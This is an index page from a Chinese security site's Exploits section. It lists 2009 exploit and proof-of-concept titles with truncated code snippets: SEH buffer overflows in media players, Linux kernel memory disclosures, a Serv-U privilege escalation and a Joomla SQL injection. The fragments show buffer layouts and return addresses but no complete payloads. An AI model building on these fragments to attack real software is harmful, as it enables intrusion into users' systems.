首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)
  日期:2009-08-07 11:16:35 点击:28 评论:0
#!/usr/bin/env python ########################################################################################### # # JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH) # Coded By: Dr_IDE # Found By: HACK4LOVE # Tested on Windows XP SP2 # ###
jetAudio 7.1.9.4030 plus vx (.m3u) Universal BOF Exploit (SEH)
  日期:2009-08-07 11:14:54 点击:1036 评论:0
#!/usr/bin/perl #soft: jetAudio v 7.1.9.4030 plus vx (.m3u ) universal buffer Overflow exploit (SEH) #based on: HACK4LOVE (http://www.milw0rm.com/exploits/9359) #exploited by: germaya_x tested on: xp sp3 (EN) #bug date: August 05 09 #greetz: hack4lov
UltraPlayer Media Player 2.112 Local Buffer Overflow PoC
  日期:2009-08-06 10:03:21 点击:104 评论:0
#!/usr/bin/perl #UltraPlayer Media Player 2.112 #Coded by SarBoT511 #Download : http://download.cnet.com/UltraPlayer-Media-Player/3000-2139_4-10041974.html?tag=mncol #GreatZ [ 2] : nEt^DeV!L [s4udi~cod3r] , dev1l fucker , The gobL!n , alM511 , BlacK
jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow (SEH)
  日期:2009-08-06 10:00:43 点击:1151 评论:0
# [+] Vulnerability : jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow # [+] Detected by : HACK4LOVE ( http://www.milw0rm.com/exploits/9359 ) # [+] Product : jetAudio # [+] Versions affected : 7.1.9.4030 plus vx # [+] ---------------------
Tuniac v.090517c (.M3U File) Local File Crash PoC
  日期:2009-08-06 09:59:09 点击:20 评论:0
#!/usr/bin/env python ############################################################################################## # # Tuniac v.090517c (.M3U) Crash PoC # Found By: Dr_IDE # http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_0
Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit
  日期:2009-08-06 09:58:22 点击:51 评论:0
/* * cve-2005-4605.c * * Linux Kernel 2.6.14.6 procfs Kernel Memory Disclosure * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605 * * The procfs code (proc_mi
MS Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC
  日期:2009-08-06 09:57:22 点击:58 评论:0
Veryfied with IE8.0.7100.0 on W7 x64 RC. !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01 Transitional http://www.w3.org/TR/html4/strict.dtd html body div style = width: 100%; max-height: 400px; overflow: scroll; script type=text/javascript src=nichtvorha
serv-u8 本地提权
  日期:2009-08-05 17:47:01 点击:53 评论:0
发布日期: 2009-08-05 更新日期: 2009-08-05 受影响系统: serv-u8 不受影响系统: 其他版本不受影响 描述: 看cnbeta发现su出8这个版本了。 想想以前写过一个7的本地提权。 不知道8有什么安全方面的更改。 下载来研究下,发现居然还是可以提权的,只是su7的那个不能
RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC
  日期:2009-08-05 11:05:29 点击:37 评论:0
# RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC # Coded by Pankaj Kohli # http://www.pank4j.com $str=Ax146; $file=sploit.mnu; open(my $FILE, $file) or die Error opening file.n; print $FILE $str ; close($FILE); print $file has been created.
BlazeDVD 5.1/HDTV Player 6.0 (.PLF File) Universal
  日期:2009-08-05 11:04:58 点击:71 评论:0
#!/usr/bin/perl # by ThE g0bL!N #THNX: His0k4 Wahdo :) #BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0 /(.PLF File) Universal Buffer Overflow Exploit (SEH) ################################################################## my $bof=x41 x 608; my $nsh
jetAudio 7.1.9.4030 plus vx (.m3u) Local Buffer Overflow PoC
  日期:2009-08-05 11:04:27 点击:43 评论:0
#!/usr/bin/perl # Found By :: HACK4LOVE # hack4love@hotmail.com # jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow PoC ######################################################################################## ##EAX 01052C10 ASCII ##ECX 007B0
MediaCoder 0.7.1.4486 (.lst) Universal Buffer Overflow Exploit (SEH)
  日期:2009-08-05 11:03:00 点击:22 评论:0
#!/usr/bin/perl #[+] Bug : MediaCoder 0.7.1.4486 (.lst) Universal Buffer overflow (SEH) #[+] Author : germaya_x #[+] Greetz : hack4love #[+] tested on: sp3 (EN) ########################################################## # win32_exec - EXITFUNC=seh C
Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit
  日期:2009-08-05 11:01:58 点击:28 评论:0
/* * sigaltstack-leak.c * * Linux Kernel = 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856 * * Ulri
Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH)
  日期:2009-08-04 11:42:32 点击:48 评论:0
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH) # ## easy ## ###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team ##AND special THANKS FOR EL7ADRANY ##AND 3ASFH
RadASM 2.2.1.5 (.mnu File) Local Format String PoC
  日期:2009-08-04 11:41:55 点击:26 评论:0
# RadASM 2.2.1.5 (.mnu File) Format string Poc # By SkuLL-HacKeR # GreetZ : hack4love - Aser ro7 - ThE g0bL!N - Qabandi # EAX 00002E2E # ECX 41413D92 ECX overwrited # EDX 00000002 # EBX 00000000 # ESP 0013F894 # EBP 0013F9AC ASCII ...................
MediaCoder 0.6.2.4275 (.lst File) Stack Buffer Overflow Exploit
  日期:2009-08-04 11:40:34 点击:52 评论:0
#!/usr/bin/perl # MediaCoder 0.6.2.4275 .lst Stack Based Overflow # Discovered by :[ SKULL-HACKER ] my $header = x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Ax46x69x6Cx65x31x3D; my $junk = x41 x 254; my $ret = x93x43x92x7c; # my $nop = x90
Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH)
  日期:2009-08-04 11:39:57 点击:21 评论:0
#!/usr/bin/python # _ _ _ __ _ _ _ #| || | (_) ___ / | |__ | | | #| __ | | | (_- | () | | / / |_ _| #|_||_| |_| /__/ __/ |__ |_| # #[+] Bug : Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH) #[+] Tested on : Xp sp3 (en) under (vb)
BlazeDVD 5.1 Professional (.PLF File) Local Buffer Overflow Exploit (SEH)
  日期:2009-08-04 11:36:28 点击:39 评论:0
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # BlazeDVD 5.1 Professional (.PLF File) Local Buffer Overflow Exploit (SEH) # ## easy ## ###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team ##AND special THANKS FOR EL7ADRANY ##AND 3A
Joomla Component com_jfusion (Itemid) Blind SQL Injection Vuln
  日期:2009-08-03 12:16:49 点击:77 评论:1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #######################
VirtualBox 2.2 - 3.0.2 r49928 Local Host Reboot PoC
  日期:2009-08-03 12:16:13 点击:38 评论:0
Sun's VirtualBox host reboot PoC by Tadas Vilkeliskis vilkeliskis.t@gmail.com Disclosure made at 2009-08-01 VULNERABILITY INFORMATION Remotely exploitable: no Locally exploitable: yes Affected versions: 2.2 - 3.0.2 r49928 for Linux VULNERABILITY DES
共637页/12733条记录 首页 上一页 [433] [434] [435] 436 [437] [438] [439] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved